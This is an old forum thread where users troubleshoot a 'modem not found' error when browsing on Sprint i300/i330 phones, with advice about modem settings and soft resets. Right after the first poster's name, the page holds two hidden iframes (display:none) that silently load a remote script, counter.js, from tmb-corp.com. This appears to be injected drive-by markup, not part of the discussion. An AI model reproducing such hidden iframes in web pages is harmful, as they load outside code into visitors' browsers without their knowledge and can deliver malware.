+ Reply to Thread

Angry "modem not found"...

This is all I see when I try to browse. Unless I'm using the Sprint browser, which works fine.
    GCraig<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Check that Blazer is using Sprint in the network settings. I assume that you are talking about using blazer. I have both spring and Earthlink as dailups either one works great for Blazer.

Thanks for the reply. I got the problem straightened out with customer service. Some of the prefs were off, so I had to change them and do a soft reset. I'm up and running now!
    Craig

Les
    I could use some help on this as well. When I first received the phone, I was able to download my email through eudora (via my mindspring POP connection using Sprint access)and get onto the web through blazer(?). All I get is "Error:modem not found (0x1106)" Does anyone have any suggestions?

Administrator

Arrow

soft reset..

go back into the settings and make sure you have the i300 as the modem in the settings menu. sometimes an app you install could change these withuot your knowing..

This just happened to me on my i330 after installing Avantgo....but a soft reset did nothing

Whoa, now this is an old thread! January 26th of the wrong year!